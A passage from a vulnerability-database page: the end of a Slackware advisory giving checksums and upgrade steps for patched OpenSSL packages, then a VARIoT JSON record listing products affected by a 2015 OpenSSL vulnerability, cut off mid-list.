Slackware x86_64 13.1 packages: f8fae10a1936cf900d362b65d9b2c8df openssl-0.9.8zf-x86_64-1_slack13.1.txz 0093e35c46382eeef03a51421895ed65 openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 7d4dd0f76252c98622a5f5939f6f0674 openssl-0.9.8zf-i486-1_slack13.37.txz e5cde01c0773ac78d33964e4107878df openssl-solibs-0.9.8zf-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 379424e15bd378e00a5ba0c709432429 openssl-0.9.8zf-x86_64-1_slack13.37.txz 54832ad7e5440ce1c496be47fec9140d openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz
Slackware 14.0 packages: 8abafa33d2bf90b6cd8be849c0d9a643 openssl-1.0.1m-i486-1_slack14.0.txz bac56213a540586d801d7b57608396de openssl-solibs-1.0.1m-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: b4c6c971e74b678c68671feed18fa7dc openssl-1.0.1m-x86_64-1_slack14.0.txz acac871e22b5de998544c2f6431c0139 openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz
Slackware 14.1 packages: c1f47f1f1ba5a13d6ac2ef2ae48bfb4c openssl-1.0.1m-i486-1_slack14.1.txz b7b1761ae1585f406d303273812043d3 openssl-solibs-1.0.1m-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 1c6e11e2e3454836d5a3e9243f7c7738 openssl-1.0.1m-x86_64-1_slack14.1.txz 25b7a704816a2123463ddbfabbc1b86d openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz
Slackware -current packages: 0926b2429e1326c8ab9bcbbda056dc66 a/openssl-solibs-1.0.1m-i486-1.txz b6252d0f141eba7b0a8e8c5bbdc314f0 n/openssl-1.0.1m-i486-1.txz
Slackware x86_64 -current packages: 99b903f556c7a2d5ec283f04c2f5a650 a/openssl-solibs-1.0.1m-x86_64-1.txz 9ecb47e0b70bd7f8064c96fb2211c4b7 n/openssl-1.0.1m-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1m-i486-1_slack14.1.txz openssl-solibs-1.0.1m-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0052", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8ze" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "0.9.8 thats all 0.9.8zf" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0 thats all 1.0.0r" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1m" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2 thats all 1.0.2a" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.3" }, { "model": "enterprise manager", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.1.4" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.3.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle business intelligence enterprise edition 11.1.1.7" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle business intelligence enterprise edition 11.1.1.9" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.3.0.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.4.0.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.5.1.1" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.6.1.0.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle exalogic infrastructure 2.0.6.2" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1 sp1" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1 sp2" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0 2007 update release 2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 10.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r1" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r3" }, { "model": "csview", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/web questionnaire" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver8.0" }, { "model": "enterpriseidentitymanager", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver2.0 to 8.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-019/019a/043) firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "hs series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "ix2000 series", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver.8.7.22 all subsequent" }, { "model": "ix3000 series", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver.8.7.22 all subsequent" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.01" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.02" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.1" }, { "model": "systemdirector enterprise", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "for java ( all models ) v5.1 to v7.2" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c ucm v8.5.4 before" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise edition v4.2 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v4.2 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard-j edition v4.1 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "uddi registry v1.1 to v7.1" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "web edition v4.1 to v6.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise edition v7.1" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v7.1" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard-j edition v7.1 to v8.1" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "web edition v7.1 to v8.1" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.4 to v9.2" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "webotx sip application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v7.1 to v8.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator agent ver3.3 to ver4.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator manager ver3.2.2 to ver4.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator probe option ver3.1.0.x to ver4.1.0.x" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "jobcenter r14.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.6, "vendor": "hp", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "hp-ux b.11.23 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "algo one ase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "icewall mcrp sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "pureapplication system interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "i operating system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip pem hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "big-ip gtm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "insight orchestration", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.7.5" }, { "model": "version control agent", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "cms", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "17.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "project openssl 1.0.2a", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.6.1.0.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "sterling integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip analytics hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "big-ip edge gateway 11.1.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip aam hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "project openssl 1.0.1m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linerate", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.4.2" }, { "model": "big-iq adc hf3", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5.0" }, { "model": "project openssl 1.0.0r", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system storage san48b-5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.11" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": 